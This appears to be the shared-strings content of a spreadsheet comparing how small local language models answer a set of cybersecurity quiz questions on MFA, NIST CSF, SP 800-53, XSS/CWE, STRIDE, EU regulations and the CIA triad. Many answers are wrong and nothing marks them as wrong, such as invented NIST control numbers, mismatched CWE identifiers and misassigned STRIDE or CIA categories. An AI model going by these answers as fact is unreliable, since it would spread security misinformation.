    <t>**Incident 1 (Power Grid):** Primarily concerned with **data protection and the protection of critical infrastructure**. The disruption to electricity distribution directly impacts human safety and economic stability, requiring robust data protection measures.
**Incident 2 (Social Media):** Primarily concerned with **data privacy and protection of personal information**.  The exposure of millions of user data breaches raises significant privacy concerns and necessitates compliance with data protection laws like GDPR.</t>
  </si>
  <si>
    <t>**Confidentiality** – The checksums ensure the integrity of the data itself, protecting it from unauthorized modification.</t>
  </si>
  <si>
    <t>gemma3:4b</t>
  </si>
  <si>
    <t>This statement is a **security policy directive**. Its primary purpose is to **reduce the risk of unauthorized access** to sensitive systems and data by requiring multiple verification methods beyond just a password.</t>
  </si>
  <si>
    <t>Based on the NIST CSF, the two most prominently demonstrated core functions are:
1.  **Identify** (assessing the impact of the attack)
2.  **Contain** (limiting the spread of the ransomware)</t>
  </si>
  <si>
    <t>The control family that specifically addresses this requirement within NIST SP 800-53 is **Audit and Accountability (AC-3)**.</t>
  </si>
  <si>
    <t>This vulnerability is commonly known as a **Cross-Site Scripting (XSS)** vulnerability.
Its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>Confidentiality.</t>
  </si>
  <si>
    <t>**Incident 1 (Power Grid):** Primarily **NIS Directive (EU Directive 2016/680)** – Focused on critical infrastructure cybersecurity.
**Incident 2 (Social Media Data Breach):** Primarily **GDPR (General Data Protection Regulation)** – Focused on data protection and privacy rights.</t>
  </si>
  <si>
    <t>**Integrity**.</t>
  </si>
  <si>
    <t>gemma3n:e2b</t>
  </si>
  <si>
    <t>This is a **security requirement statement**. 
Its primary purpose is to **enhance the security of administrative access** by requiring multiple forms of verification, making it significantly harder for unauthorized individuals to gain access to sensitive systems and data. It aims to mitigate the risk of compromised credentials.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by the company's actions are:
1. **Identify:**  The incident response plan and system restoration are actions to *detect* and *understand* the attack and its impact.
2. **Protect:** Activating the plan and restoring systems are actions to *prevent further damage* and *recover* from the attack.</t>
  </si>
  <si>
    <t>**AC-11: Audit and Accountability**
This control family directly addresses the requirement for recording actions performed by privileged users in immutable logs. It focuses on establishing audit trails for security-relevant events.</t>
  </si>
  <si>
    <t>The vulnerability is **Cross-Site Scripting (XSS)**.
The corresponding CWE identifier is **CWE-79**. 
CWE-79 describes the vulnerability where untrusted data is displayed in a web page without proper validation or sanitization, allowing an attacker to execute arbitrary code in the context of the victim's browser.</t>
  </si>
  <si>
    <t>**Manipulation**
This threat directly involves altering data in transit, which falls under the "Manipulation" category of the STRIDE model.</t>
  </si>
  <si>
    <t>**Incident 1 (Power Grid Disruption):** The primary concern is **NIS Directive (EU 2016/1147)**. This directive aims to improve cybersecurity of critical infrastructure.
**Incident 2 (Social Media Data Breach):** The primary concern is the **General Data Protection Regulation (GDPR)**. This regulation governs the processing of personal data and imposes strict requirements for data security and breach notification.</t>
  </si>
  <si>
    <t>Confidentiality. 
Data checksums help ensure the integrity of the data, which is a key aspect of protecting data from unauthorized access and modification. While integrity is also involved, the *purpose* of the checksum is to prevent unauthorized *alteration* of the data, which falls under confidentiality (protecting data from being viewed by unauthorized parties).</t>
  </si>
  <si>
    <t>granite3-dense:2b</t>
  </si>
  <si>
    <t>This statement is a security requirement or policy. Its primary purpose is to ensure that only authorized individuals with multiple forms of authentication can access the system's administrative functions, reducing the risk of unauthorized access and potential security breaches.</t>
  </si>
  <si>
    <t>The most prominently demonstrated core functions by the company's actions would be:
1. Identify: The company has identified the ransomware attack as a cybersecurity incident, triggering their incident response plan.
2. Respond: The company has activated their incident response plan to contain the damage and begin restoring systems from backups, demonstrating their response to the incident.</t>
  </si>
  <si>
    <t>The control family within the NIST SP 800-53 standard that specifically addresses the requirement of recording all actions performed by privileged users in immutable, time-stamped log files is "Audit and Accountability." More precisely, it relates to Control Objective 1 (CO1) - "Establish a comprehensive audit trail program" and Control Family 1 (CF1) - "Maintain an audit log."</t>
  </si>
  <si>
    <t>This is an example of a security vulnerability known as "Cross-Site Scripting" (XSS). The corresponding Common Weakness Enumeration (CWE) identifier for this vulnerability is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Spoofing" category in the STRIDE threat model, as it involves an unauthorized user attempting to impersonate the client or server to intercept and alter data packets being sent between them.</t>
  </si>
  <si>
    <t>1) The primary concern for the nationwide power grid operator would be the Nuclear Energy Safety Regulation (EU) 2016/1148, as cyberattacks on critical infrastructure can have severe consequences.
2) For the social media company, the General Data Protection Regulation (GDPR) (EU) 2016/679 would be the primary concern, as data breaches involving personal messages of millions of users fall under the category of personal data processing.</t>
  </si>
  <si>
    <t>The principle of integrity from the CIA triad is primarily being upheld by this security control. Data checksums help ensure that data remains unaltered during transmission and storage, maintaining its integrity.</t>
  </si>
  <si>
    <t>granite3-dense:8b</t>
  </si>
  <si>
    <t>This is a security policy statement. Its primary purpose is to establish a clear requirement for implementing multi-factor authentication (MFA) as a mandatory control for all administrative access within the system. This helps to enhance the overall security posture by adding an extra layer of protection against unauthorized access and potential cyber threats.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by activating an incident response plan and restoring systems from backups in response to a ransomware attack are:
1. **Identify** (ID): This function involves developing an organizational understanding of how to manage cybersecurity risks to systems, people, assets, data, and capabilities. In this scenario, the company's incident response plan demonstrates their ability to identify and understand the risks associated with ransomware attacks and have a plan in place to manage them.
2. **Respond** (RS): This function focuses on managing the consequences of a cybersecurity event by containing the damage and restoring systems from backups. The company's actions to contain the damage and restore systems from backups directly demonstrate their ability to respond effectively to the ransomware attack.</t>
  </si>
  <si>
    <t>The control family within the NIST SP 800-53 standard that specifically addresses this type of requirement is Audit and Accountability (AU). This family includes controls such as AU-2(a) for logging user activity and AU-7(1) for maintaining log records in an immutable format.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), specifically Stored XSS, and its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Spoofing" category within the STRIDE threat model. Spoofing involves impersonating or masquerading as another entity, in this case, an unauthorized user intercepting and altering data packets to change the amount of a financial transaction.</t>
  </si>
  <si>
    <t>For the power grid operator's cyberattack, the primary regulation would be the EU's Nuclear Safety Directive (NSD) or the Network Code for Electricity Transmission (ENTC), depending on the specifics of the incident. For the social media company's data breach, the primary regulation would be the General Data Protection Regulation (GDPR).</t>
  </si>
  <si>
    <t>The principle of the CIA triad primarily being upheld by this security control is Integrity, as it ensures that data has not been altered or corrupted during transmission and storage in the cloud.</t>
  </si>
  <si>
    <t>granite3.2:2b</t>
  </si>
  <si>
    <t>This statement falls into the category of security policy or a security control. Its primary purpose is to ensure robust protection against unauthorized access to an administrative system by requiring multiple forms of identification (MFA), which significantly increases the barrier for potential attackers attempting to gain such access, thus enhancing overall cybersecurity.</t>
  </si>
  <si>
    <t>The actions described most closely align with the following two core functions of the NIST Cybersecurity Framework:
1. **Prepare**: The company had likely prepared for such a scenario through incident response planning, backup creation and testing, and possibly having specific ransomware mitigation strategies in place. These measures are part of preparing for detecting and responding to cybersecurity events.
2. **Detect**: Activation of the incident response plan indicates an effective detection capability. This function involves identifying signs that indicate a cybersecurity event has occurred, such as unusual network traffic or system errors which could be indicative of a ransomware attack.</t>
  </si>
  <si>
    <t>The security control within the NIST Special Publication (SP) 800-53 that corresponds to recording all actions performed by privileged users in immutable, time-stamped log files is under Control Family: Security Monitoring and Protection. The specific control number is IA-5(12).</t>
  </si>
  <si>
    <t>The common name for this type of vulnerability is "Cross-Site Scripting (XSS) with Reflection." Its corresponding Common Weakness Enumeration (CWE) identifier is CWE-134. This occurs when a web application takes user-supplied data and dynamically includes it into a string, without proper input validation or output encoding, leading to potential code injection. In this case, the attacker exploits it by embedding malicious JavaScript within a comment.</t>
  </si>
  <si>
    <t>This threat belongs to the STRIDE category called 'Spoofing'. In this context, an unauthorized user is impersonating either the client or server (spoofing), intercepting data packets and altering them (intercept) with the intention of changing financial transaction amounts.</t>
  </si>
  <si>
    <t>Incident 1 (nationwide power grid operator's cyberattack disrupting electricity distribution): The primary concern here would fall under the scope of EU's Network and Information Security (NIS) Directive. This directive requires operators of essential services to implement appropriate security measures to protect their critical infrastructure against cyber threats, potentially including physical attacks that could disrupt services.
Incident 2 (social media company data breach): The primary concern for this incident would be the General Data Protection Regulation (GDPR). This EU law, applicable since May 2018, regulates how companies collect and process personal data of European citizens. A data breach exposing millions of users' messages implies a serious violation of GDPR's data protection principles, including the rights to be informed about data breaches and for them to have it corrected or deleted.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad that this security control supports is "Confidentiality." While data integrity (verifying changes to data) is also maintained, confidentiality—ensuring authorized access and protection against unauthorized disclosure—is more strongly upheld by using checksums.</t>
  </si>
  <si>
    <t>granite3.2:8b</t>
  </si>
  <si>
    <t>This statement is a security policy directive. Its primary purpose is to establish a mandatory practice (enforcing multi-factor authentication) that enhances security by requiring an additional layer of verification for administrative access, thereby reducing the risk of unauthorized entry due to compromised credentials.</t>
  </si>
  <si>
    <t>The NIST Cybersecurity Framework identifies five Core Functions: Identify, Protect, Detect, Respond, and Recover. 
In this scenario, the company is demonstrating the following two core functions:
1. Respond: This involves activities like activating an incident response plan and containing damage to minimize further harm.
2. Recover: Restoring systems from backups falls under this category as it's about recovering functionality and data after an incident.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that specifically addresses recording actions performed by privileged users in immutable, time-stamped logs is 'Audit and Accountability'. The specific control is AC-2 (Audit and Accountability Data) which requires organizations to protect audit and accountability data.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). Its corresponding CWE identifier is CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')).</t>
  </si>
  <si>
    <t>This threat falls under the 'Tampering' category in the STRIDE threat model. Tampering represents threats where data is altered in transit or at rest without authorization.</t>
  </si>
  <si>
    <t>For incident 1 (cyberattack on power grid), the primary regulatory concern would be the Network and Information Systems (NIS) Directive. This EU directive aims to enhance cybersecurity across critical infrastructure sectors like energy.
For incident 2 (data breach in a social media company), the General Data Protection Regulation (GDPR) would be the primary concern. GDPR regulates how personal data is processed and protected for individuals within the European Union, imposing strict rules on organizations that experience data breaches.</t>
  </si>
  <si>
    <t>The principle of Integrity from the CIA triad is primarily being upheld by this security control. The use of data checksums ensures the accuracy and consistency of files over their entire lifecycle, preventing unauthorized alteration or corruption.</t>
  </si>
  <si>
    <t>lily_cyber:latest</t>
  </si>
  <si>
    <t>Oh, I see you've presented me with a juicy question! So, let's dive into it, shall we? 
The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" can be classified as a requirement or a policy. Its primary purpose is to ensure the security and integrity of the system by implementing strong authentication measures. 
Multi-factor authentication, also known as two-factor or even multi-step authentication, adds an extra layer of protection to the traditional username/password combination. It requires users to provide multiple forms of identification to gain access to administrative privileges. By doing so, it significantly reduces the risk of unauthorized access and strengthens the overall security posture of the system.
By mandating MFA for all administrative access, we're essentially saying that no one should be granted elevated privileges without providing additional proof of their identity. This helps prevent unauthorized individuals from gaining access to sensitive information or making changes to critical systems. It also protects against common attacks such as password theft, phishing, and credential stuffing.
In summary, the primary purpose of this statement is to promote security by requiring multi-factor authentication for all administrative access. This helps safeguard the system from potential threats and ensures that only authorized individuals can perform administrative tasks. It's a crucial aspect of implementing strong cybersecurity measures.</t>
  </si>
  <si>
    <t>To answer this question, we need to delve into the NIST Cybersecurity Framework's (CSF) Core Functions. The CSF outlines five core functions that organizations should focus on to enhance their cybersecurity posture. These core functions are: Identify, Protect, Detect, Respond, and Recover.
Now, let's examine the scenario you presented. When a company activates their incident response plan to contain damage and restore systems from backups, it highlights their efforts in two significant areas: Incident Response (Response) and Resilience (Recover).
Incident Response is one of the core functions in the NIST CSF. It refers to the actions taken to detect, respond to, and recover from a cybersecurity incident. In this scenario, when the company activates their incident response plan, they are demonstrating their ability to effectively respond to a security incident by implementing containment measures and initiating the recovery process.
Resilience, on the other hand, is another core function highlighted in this situation. Resilience refers to an organization's ability to anticipate, prepare for, respond to, and recover from adverse events, including cybersecurity incidents. By restoring systems from backups, the company is demonstrating their capability to bounce back and maintain business continuity despite a cyberattack.
So, in summary, according to the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by the actions taken in this scenario are Incident Response (Response) and Resilience (Recover).</t>
  </si>
  <si>
    <t>### Solution:
The security policy you described falls under the category of Access Control. Specifically, it aligns with Control Family #6 (Logical Access) within NIST SP 800-53. This control family emphasizes the importance of recording all actions performed by privileged users to maintain accountability and ensure proper auditing. By implementing systems that log such activities in immutable, time-stamped log files, organizations can effectively monitor and review user behavior while maintaining a robust security posture.</t>
  </si>
  <si>
    <t>### Solution:
The common name for this vulnerability is Cross-Site Scripting (XSS) and its corresponding Common Weakness Enumeration (CWE) identifier is CWE-79. 
In the scenario you provided, an attacker takes advantage of a lack of proper input validation and sanitization in the comments section of a web application to inject malicious JavaScript code. This code can be executed in the context of the targeted users, potentially leading to unauthorized access or theft of sensitive information such as cookies.
Cross-Site Scripting is a type of security vulnerability that allows attackers to insert and execute malicious scripts within trusted web pages viewed by other users. It exploits the trust relationship between the user's browser and the web application, allowing the attacker to manipulate or steal sensitive data.
The CWE identifier for XSS is CWE-79 because it specifically refers to vulnerabilities that arise due to insufficient input validation and sanitization, making it a common cause for such attacks. It's important for developers to implement proper security measures like input validation, output encoding, and access control to mitigate the risks associated with XSS vulnerabilities.</t>
  </si>
  <si>
    <t>### Solution:
Oh, STRIDE! That's one of my favorite frameworks for thinking about security threats. So, let me dive into it for you!
In the given scenario, the risk is all about an unauthorized user intercepting and tampering with data packets during a financial transaction between a client and a server. Now, within the STRIDE model, this type of threat falls under the category of "Spoofing". It's like someone trying to pretend to be someone they aren't, but in this case, it's all about impersonating another system or user.
By spoofing, that unauthorized user gains an advantageous position where they can intercept and alter the data packets, ultimately changing the amount of a financial transaction. Sneaky, right? But worry not! As cybersecurity professionals, we need to be on guard against such threats and take appropriate measures to defend against them.
So, to sum it up, within STRIDE, this threat belongs to the "Spoofing" category. Remember, understanding these categories helps us identify vulnerabilities and develop effective countermeasures to protect our systems and data from sneaky cyber attackers like those unauthorized users out there!</t>
  </si>
  <si>
    <t>Incident 1, where the nationwide power grid operator experiences a cyberattack resulting in disrupted electricity distribution, falls under the purview of the Network and Information Systems Directive (NIS Directive) within the European Union. This directive focuses on the protection and security of critical infrastructure, ensuring their resilience against cyber threats.
On the other hand, incident 2, involving a social media company's data breach leading to exposed personal messages for millions of users, falls under the scope of the General Data Protection Regulation (GDPR). The GDPR is primarily concerned with safeguarding personal data and ensuring privacy rights are protected. It enforces strict regulations on how organizations handle and process personal information, including the implementation of robust security measures to prevent data breaches.
In summary, incident 1 involving the power grid operator would be addressed through the NIS Directive, while incident 2 pertaining to the social media company's data breach would be governed by the GDPR. Both regulations play essential roles in safeguarding different aspects of security within the EU.</t>
  </si>
  <si>
    <t>Ah, the principle of integrity! I'm happy to shed some light on this for you. When a cloud storage service uses data checksums like SHA-256 hashes to verify file integrity during upload or download, it's all about ensuring that those files remain unaltered and as they were intended to be. So, by using these checksums, the cloud storage service is upholding the principle of integrity.
You see, integrity is all about maintaining the trustworthiness and accuracy of data. By using data checksums, the cloud storage service is able to detect any unauthorized changes or corruption in the files. It's like a digital fingerprint that ensures the files haven't been tampered with along the way.
By upholding this principle of integrity through the use of data checksums, we can have confidence that our precious files are safe and sound in the cloud storage service. So, kudos to those cloud providers for making sure our data remains intact!</t>
  </si>
  <si>
    <t>llama3:8b</t>
  </si>
  <si>
    <t>This statement is a Security Control or a Countermeasure in the context of cybersecurity.
Its primary purpose is to ensure that administrative access to the system is secure by requiring at least two types of verification factors (something you know, something you have, or something you are) beyond just a password. This aims to prevent unauthorized access and minimize the risk of account compromise, thereby strengthening overall system security.</t>
  </si>
  <si>
    <t>Based on the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by the company's actions are:
1. Detect: By activating their incident response plan and identifying the ransomware attack, the company is demonstrating the detection function of the CSF, which involves identifying and reporting cybersecurity events.
2. Respond: By containing the damage, restoring systems from backups, and taking steps to prevent future incidents, the company is demonstrating the respond function of the CSF, which involves taking action to contain, mitigate, or eradicate the detected cybersecurity event.</t>
  </si>
  <si>
    <t>The control family that addresses this requirement is AU-2, "Audit Generation". Specifically, AU-2(1) states: "The organization shall generate audit records for all actions performed by privileged users." This control ensures that the required logging and auditing are in place to track and monitor activities of privileged users.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is "Cross-Site Scripting (XSS)". The corresponding CWE identifier is CWE-79: Improper Encoding or Lack of Encoding in Vulnerable Code.</t>
  </si>
  <si>
    <t>This threat belongs to the "Tampering" category in the STRIDE threat model. Tampering refers to unauthorized modifications or alterations to data in transit, such as intercepting and modifying financial transaction amounts.</t>
  </si>
  <si>
    <t>For incident 1 (power grid operator), the primary concern would be the Network and Information Systems (NIS) Directive.
This directive requires operators of essential services, such as energy, transport, and healthcare, to implement specific security measures and report significant incidents to authorities. The NIS Directive aims to ensure a high level of network and information systems security throughout the EU.
For incident 2 (social media company), the primary concern would be the General Data Protection Regulation (GDPR).
The GDPR regulates the processing of personal data, including sensitive information like messages. In this case, the breach exposes millions of users' personal messages, making it a significant violation of their privacy rights. The GDPR requires the social media company to notify affected individuals and authorities about the incident, as well as implement measures to prevent future breaches.</t>
  </si>
  <si>
    <t>The principle of confidentiality is being primarily upheld by this security control, as it ensures that the integrity of the data (files) remains unchanged and secure from unauthorized modifications or corruption.</t>
  </si>
  <si>
    <t>llama3.2:1b</t>
  </si>
  <si>
    <t>This statement is a statement of policy or best practice in the context of cybersecurity.
In terms of type, it falls under "Risk Management" or more specifically, "Security Policy" or "Compliance." It outlines a specific requirement for ensuring the security of an organization's systems and data.
The primary purpose of this statement is to ensure that administrative access to the system is protected from unauthorized use or exploitation. By enforcing MFA, the organization is attempting to prevent potential attacks such as phishing, account takeovers, or brute-force attempts to gain access to sensitive information.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions that are most prominently demonstrated by a company's incident response plan for containing and responding to a ransomware attack include:
1. **Identify**: This function involves gathering and analyzing threat information, including network traffic, system logs, and other relevant data. The company is actively collecting and analyzing data to understand the scope of the attack, identify potential vulnerabilities, and determine the effectiveness of their response.
2. **Respond and Recover**: This function focuses on taking control actions to mitigate or eliminate the impact of a cyber event, restoring systems, and minimizing damage. In this scenario, the company is activating their incident response plan, which includes restoring systems from backups, to contain the damage and minimize the risk of further exploitation.
These two core functions are critical in demonstrating the CSF's framework for incident response planning and demonstrate the company's preparedness and ability to respond effectively to a ransomware attack.</t>
  </si>
  <si>
    <t>Within the NIST SP 800-53 standard, the control family that specifically addresses the requirement for recording actions performed by privileged users, including logins and system changes, in immutable, time-stamped log files is:
F.3.1: Log Collection and Verification (Recorded Data)
This control family requires that logs be collected and verified to ensure that all actions authorized by a user have been recorded in the logs. Specifically, it states that logs must be generated for each action performed by any user, including login attempts and system changes.
The NIST SP 800-53 standard defines this requirement as part of the Information Security Program Management System (ISPMS) control family.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is "DOM-based cross-site scripting" (CSF) or more specifically, "DOM injection". 
The corresponding CWE (Common Weakness Enumeration) identifier for this vulnerability is CWE-80: Data Expression Attacks.</t>
  </si>
  <si>
    <t>This threat would fall under the "Social" (S) category in the STRIDE threat model, as it involves unauthorized access or alteration of sensitive data, specifically financial transactions.</t>
  </si>
  <si>
    <t>For incident 1, the primary regulation that comes into play is the General Data Protection Regulation (GDPR). The GDPR provides robust safeguards to protect personal data, including encryption, secure storage, and audit logs. It also imposes strict obligations on the power grid operator to notify affected individuals and provide them with adequate information about the breach.
For incident 2, the primary regulation that comes into play is Article 33 of the General Data Protection Regulation (GDPR), which deals specifically with data breaches. This article requires notification to the relevant authorities within 72 hours of the breach, along with a summary of the circumstances and details of the data compromised. Additionally, organizations must also notify affected users, as required under Article 40.
However, if we look at national laws that may be applicable in both cases, incident 1 would likely fall under the jurisdiction of the General Data Protection Regulation (GDPR), while incident 2 might be governed by various EU laws, including Directive 2009/34/EC on Information Security and Directive 95/46/EC on Data Protection.</t>
  </si>
  <si>
    <t>This security control is primarily upholding the "Confidentiality" principle of the CIA triad.
The CIA triad consists of Confidentiality, Integrity, and Availability, which are the three key aspects of information security. 
- Confidentiality refers to protecting sensitive data from unauthorized access.
- Integrity refers to ensuring that data has not been altered or corrupted during transmission or storage.
- Availability refers to ensuring that data is accessible when needed.
In this case, the use of data checksums (like SHA-256 hashes) helps to ensure the integrity and authenticity of files in transit. By verifying the contents of a file through these hash checks, the cloud storage service can confirm that the original data has not been altered or corrupted during upload or download. This helps to maintain the confidentiality of the data by preventing unauthorized access to modified versions of the file.</t>
  </si>
  <si>
    <t>llama3.2:3b</t>
  </si>
  <si>
    <t>In the context of cybersecurity, the given statement is a **security policy** or a **policies directive**.
Its primary purpose is to **establish a security requirement** or a **control** that mandates multi-factor authentication (MFA) for all administrative access. This type of statement aims to enforce a specific security standard to protect sensitive areas of the system, such as administrative interfaces and data storage areas, from unauthorized access.</t>
  </si>
  <si>
    <t>In this scenario, the two core functions of the NIST Cybersecurity Framework (CSF) that are most prominently demonstrated by the company's actions are:
1. **Identify**: The company identifies and contains the ransomware attack, reducing its impact on the organization.
2. **Respond**: By activating their incident response plan and restoring systems from backups, the company is responding to the identified threat, taking control of the situation, and minimizing further damage.
These two core functions are essential in addressing the immediate consequences of a cybersecurity incident like ransomware, and they form the foundation for more advanced cyber operations.</t>
  </si>
  <si>
    <t>The specific control family within NIST SP 800-53 that addresses recording actions performed by privileged users is AU-6, "Record and Monitor Privileged Access Actions."</t>
  </si>
  <si>
    <t>The vulnerability described is known as a "Cross-Site Scripting (XSS)" vulnerability, specifically a type of XSS called a "Reflected XSS".
The corresponding Common Weakness Enumeration (CWE) identifier is CWE-89: Improper Input Handling ('Command Injection') and also CWE-434: Unvalidated Redirects and Forwards. However, the most commonly associated CWE for Reflected XSS is CWE-89.
This vulnerability occurs because the web application directly renders the user input without sanitizing or validating it, allowing an attacker to inject malicious JavaScript code that can be executed by other users' browsers.</t>
  </si>
  <si>
    <t>In the STRIDE (Spoofing, Tampering, Repudiation, Denial of Service, Elevation of Privilege) threat model, "Tampering" is the category that applies in this scenario.
This is because an unauthorized user intercepting and altering data packets would be modifying or changing the data being sent between the client and server.</t>
  </si>
  <si>
    <t>For Incident 1 (nationwide power grid operator), the primary concern would be the EU's Network and Information Systems (NIS) Directive. This directive aims to ensure the security of critical infrastructure and requires operators to implement measures to prevent and respond to cyber threats.
For Incident 2 (social media company), the primary concern would be the General Data Protection Regulation (GDPR). Although GDPR is a data protection regulation, its provisions on data breach notification requirements can also apply in cases where sensitive personal data has been compromised. However, for incidents specifically targeting critical infrastructure or essential services like power grids, NIS Directive would take precedence over GDPR.</t>
  </si>
  <si>
    <t>The principle of Confidentiality, Integrity, and Availability (CIA triad) states:
- Confidentiality: Protects data from unauthorized access
- Integrity: Ensures data is not modified or altered without authorization
- Availability: Guarantees access to data when needed
In this scenario, the cloud storage service's use of checksums primarily upholds the principle of **Integrity**. By verifying file integrity using SHA-256 hashes, they ensure that files are not tampered with or corrupted during upload or download.</t>
  </si>
  <si>
    <t>mistral:7b</t>
  </si>
  <si>
    <t>The statement is a **Security Control or Policy Statement**. Its primary purpose in the context of cybersecurity is to define a security measure aimed at enhancing account access security. Multi-factor authentication (MFA) is used to verify the identity of users by requiring two or more independent credentials, reducing the risk of unauthorized access to administrative accounts.</t>
  </si>
  <si>
    <t>1. Identify: Activating the incident response plan involves identifying the ransomware attack, which is a key part of understanding organizational assets and their vulnerabilities as per the NIST CSF.
2. Protect: Containing the damage and restoring systems from backups are actions to protect against further harm and recovery, demonstrating the implementation of appropriate protections and safeguards.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that addresses this type of requirement is 'Audit and Accountability' (Control Family: AU). Specifically, Control AU-6 states, "Information system activity shall be monitored, collected, correlated, protected, retained, and disposed of in support of the investigation, analysis, and reporting of cybersecurity incidents."</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), and its corresponding Common Weakness Enumeration (CWE) identifier is CWE-79.</t>
  </si>
  <si>
    <t>The identified threat belongs to the "T" category in the STRIDE threat model, which stands for "Temper With". This category includes threats related to data modification or manipulation.</t>
  </si>
  <si>
    <t>1) The primary concern for incident 1 (the power grid attack) would be the Network and Information Security Directive (NIS Directive), specifically its focus on essential services such as energy and digital infrastructure.
2) For incident 2 (data breach at a social media company), the General Data Protection Regulation (GDPR) is the primary concern due to its emphasis on data privacy and protection, especially when dealing with personal data of EU citizens.</t>
  </si>
  <si>
    <t>Confidentiality is not primarily being upheld by using data checksums, as they are more focused on Integrity (ensuring data hasn't been changed unintentionally) and Availability (the data can be accessed when needed). Checksums do not necessarily protect the data from unauthorized access or disclosure.</t>
  </si>
  <si>
    <t>nomic-embed-text:latest</t>
  </si>
  <si>
    <t>Error: Request to Ollama failed: 400 Client Error: Bad Request for url: http://localhost:11434/api/generate</t>
  </si>
  <si>
    <t>phi3:3.8b</t>
  </si>
  <si>
    <t>This statement represents a security requirement in an imperative form. Its main objective is to enhance the protection against unauthorized access by mandating additional authentication methods beyond just usernames and passwords for administrative activities within an IT system or network, thereby increasing accountability and reducing risk of breaches caused by compromised credentials.</t>
  </si>
  <si>
    <t>The cybersecurity team of a company is primarily demonstrating the 'Respond' function when activating their incident response plan and restoring systems from backups following a ransomware attack. Simultaneously, they exemplify elements of the 'Recover' aspect as part of returning to normal operations post-incident.</t>
  </si>
  <si>
    <t>Control Family: Conducting Internal Security Awareness and Training (C2) Controls within the 'Personnel and Organizational Policies' subcategory is relevant here. Additionally, NIST Special Publication 800-53 references specific controls that align with this requirement such as CM-6 which pertains to audit logging of privileged users’ actions (e.g., logins), ensuring these logs are immutable and time-stamped for compliance purposes, although it does not explicitly mention 'immutable' or 'time-stamped.' For a policy requiring records that meet those characteristics, one might refer to the CMG - Management of Audit Logs (Control Category Manager) as an extended guidance.</t>
  </si>
  <si>
    <t>The described scenario depicts an SQL Injection attack, which falls under Cross-Site Scripting (XSS). The specific issue where a script tag containing malicious code gets inserted into web pages that are served to users can be identified with the Common Weakness Enumeration identifier CWE-702.</t>
  </si>
  <si>
    <t>This type of threat falls under the "Tampering" category within the STRIDE methodology for identifying threats in security models such as cybersecurity and software development processes. The intent is not just unauthorized access but specifically altering transaction data, which directly impacts the integrity aspect assessed by tampering attacks.</t>
  </si>
  <si>
    <t>Incident 1 primarily concerns Regulation (EU) No 910/2014 on security of network and information systems adopted by the European Union to address cybersecurity. Incident 2 relates mainly to the General Data Protection Regulation (GDPR), which aims to protect personal data within EU member states, imposing strict rules on handling such data including in cases where there's been unauthorized access due to a breach.</t>
  </si>
  <si>
    <t>Integrity, as it ensures the data has not been tampered with and remains accurate from source to destination.</t>
  </si>
  <si>
    <t>phi4-mini:3.8b</t>
  </si>
  <si>
    <t>This is an organizational security policy directive aimed at enhancing account protection by requiring multiple forms of verification before granting user privileges. The main objective here includes mitigating risks associated with unauthorized data exposure or system manipulation due to compromised credentials through MFA which adds layers like something you know (password), possess (token/fob, biometric) and/or a location factor as an additional layer beyond simple username/password authentication.</t>
  </si>
  <si>
    <t>Defense, Protection of Resources; Detection. The company's immediate action to limit impact is part of 'Protect' under Defense activities in CSF's third function category.
The initiation and execution process for restoring systems from backups falls into the second NIST Cybersecurity Framework Core Function: Recovery (Re), specifically related to Response capabilities that involve recovery planning, preparation procedures, communications plans with stakeholders.</t>
  </si>
  <si>
    <t>The relevant Control Family within NIST SP 800-53 for recording all activities from privileged user actions is "Audit and Accountability" (AU). More precisely, AU-SA stands for Audit Storage Associated with audit records that must be immutable. This ensures accountability by maintaining a record as per the security policy described in your question.</t>
  </si>
  <si>
    <t>This type of security flaw in web applications, where user input can inject malicious scripts leading to Cross-Site Scripting (XSS) attacks by executing unauthorized commands on behalf of a trusted client. The specific instance mentioned involves cookie theft through XSS.
The common name for this vulnerability would be "Cross-site scripting" and the corresponding Common Weakness Enumeration identifier is CWE-77: Improper Neutralization During Output Generation - Inappropriate Response to User-Supplied Data or Control Input.</t>
  </si>
  <si>
    <t>Spoofing (S).</t>
  </si>
  <si>
    <t>For Incident 1 (nationwide power outage), NIS Directive would be primarily concerned as it applies to key services such as electricity distribution in EU member states.
For Incident 2 (social media data breach with exposure of personal messages on millions of users' accounts), GDPR is the primary regulation, which focuses extensively on protecting user privacy and securing personal information.</t>
  </si>
  <si>
    <t>Integrity. The use of data checksums ensures information integrity, confirming that stored and transferred content remains unchanged from its original state after it has gone through an authorized change process (upload/download). This upholds one key aspect of the "Integrity" principle in the CIA triad - maintaining accurate records for audit purposes to detect any unauthorized alterations.</t>
  </si>
  <si>
    <t>phi4-mini-reasoning:3.8b</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Analyzing the Statement:&lt;/strong&gt;&lt;br /&gt;
# 'The system must enforce multi-factor authentication (MFA) for all administrative access.'&lt;/p&gt;
## What Type of Statement Is This?
This is a **security requirement** or mandate. It specifically outlines a procedural safeguard that systems and administrators must adhere to.
## Purpose/Function of The Statement
### 1\. Enhanced Security:
   - MFA adds layers of protection beyond simple passwords (e.g., biometrics, hardware tokens), significantly reducing the risk of unauthorized access due to compromised credentials.
### 2\. Compliance with Policies/Ethical/Human Rights Standards:
   - Many regulatory frameworks and organizational policies mandate or encourage MFA for sensitive roles.
   - From an ethical standpoint, it aligns with principles like "due diligence" in protecting systems/resources.
   - It also upholds user trust ("human rights" to security/information integrity in certain contexts).
### 3\. Mitigation of Risks:
